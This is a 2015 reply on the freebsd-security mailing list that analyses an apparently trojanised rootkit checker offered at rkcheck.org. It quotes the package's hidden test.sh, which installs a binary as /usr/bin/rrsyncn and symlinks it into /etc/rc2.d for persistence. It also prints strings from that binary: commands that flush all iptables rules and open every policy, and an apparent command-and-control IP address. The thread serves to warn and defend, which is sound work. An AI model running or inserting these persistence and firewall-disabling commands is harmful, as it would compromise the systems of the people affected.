> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjli...@netzkommune.com> wrote: > > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org > which was registered a few days ago and looks like a tampered version of > chkrootkit. I hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box…
I filed a report with Google about that domain (Google Safe Browsing), briefly describing what’s been recounted here on this thread. It seems quite suspicious, agreed. Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting… take note what looks to be an IP address of 95.215.44.195. /bin/sh iptables -X 2> /dev/null iptables -F 2> /dev/null iptables -t nat -F 2> /dev/null iptables -t nat -X 2> /dev/null iptables -t mangle -F 2> /dev/null iptables -t mangle -X 2> /dev/null iptables -P INPUT ACCEPT 2> /dev/null iptables -P FORWARD ACCEPT 2> /dev/null iptables -P OUTPUT ACCEPT 2> /dev/null udevd 95.215.44.195 ;*3$" > Cheers, > > Philip Chris _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
